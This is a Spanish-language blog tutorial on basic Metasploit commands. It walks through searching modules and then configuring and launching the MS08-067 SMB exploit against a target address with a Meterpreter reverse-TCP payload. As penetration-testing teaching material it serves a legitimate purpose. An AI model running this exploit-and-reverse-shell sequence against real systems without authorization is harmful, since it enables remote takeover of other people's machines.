Comandos Metasploit

Iniciar Metasploit

# msfconsole

Actualizar Metasploit

Es conveniente ejecutar este comando antes de iniciar Metasploit para descargar la lista de exploits y módulos más recientes antes de comenzar a trabajar.

# msfupdate

Buscar un exploit en Metasploit

Debido a que la cantidad de exploits es muy grande, de vez en cuando es necesario hacer una búsqueda para encontrar un exploit en particular o un grupo de exploits que correspondan a una categoría. El siguiente ejemplo busca los exploits relacionados con java.

msf > search java

Usar un exploit en Metasploit

Una vez que se tiene ubicado el exploit que se quiere utilizar, el siguiente paso es cargarlo en Metasploit para configurarlo. El siguiente comando carga el exploit de SMB para explotar la vulnerabilidad ms08-067. Tome en cuenta que el framework puede autocompletar las rutas presionando la tecla TAB.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) >

Configurar variables de un exploit en Metasploit

Una vez que se ha cargado el exploit con el que se va a trabajar, el siguiente paso es configurar las variables marcadas como requeridas, las que son opcionales se pueden dejar sin definir. Si una variable requerida ya está configurada, se puede dejar su valor por defecto a menos de que se quiera modificar su configuración.

Para ver las variables que hay que configurar se puede usar el siguiente comando:

msf  exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   —-     —————  ——–  ———–
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Todas las opciones cuyo valor sea “yes” bajo la columna “Required” deben estar configuradas. El siguiente ejemplo configura la variable RHOST para poner el valor de la máquina a la que se quiere atacar.

msf  exploit(ms08_067_netapi) > set RHOST 192.168.75.35

Cargar un Payload en Metasploit

Una vez que se tiene cargado el exploit, el siguiente paso es cargar el payload que se va a utilizar. El siguiente ejemplo carga el payload de Meterpreter para generar cmd reverso en la máquina víctima.

msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Cambiar el target del exploit en Metasploit

En algunas ocasiones será necesario ajustar la plataforma del sistema operativo al que se quiere atacar, en estos casos primero hay que ver qué sistemas operativos son soportados por el exploit que tenemos seleccionado. El siguiente ejemplo muestra los targets para la vulnerabilidad ms08-067.

msf  exploit(ms08_067_netapi) > show targets

Como resultado veremos una lista que comienza con un número. Ya que ubicamos el sistema sobre el que se quiere aplicar el exploit ejecutamos el siguiente comando para que el valor quede fijo.

msf  exploit(ms08_067_netapi) > set TARGET 1

La opción por defecto siempre tiene el valor “0” que significa selección de target automática y sólo en raras ocasiones necesita cambiarse.

Ejecutar el exploit en Metasploit

Ya que tenemos el exploit, target y payload configurados el último paso es ejecutar el exploit. Para esto ejecutmos el comando “exploit” como se muestra a continuación.

msf  exploit(ms08_067_netapi) > exploit

 

No olvides revisar nuestro tag Metasploit para mayor información sobre este Framework.

Recuerda que puedes mandarnos tus preguntas y comentarios a nuestra cuenta de Twitter: @redinskala donde encontrarás más información y tips de seguridad.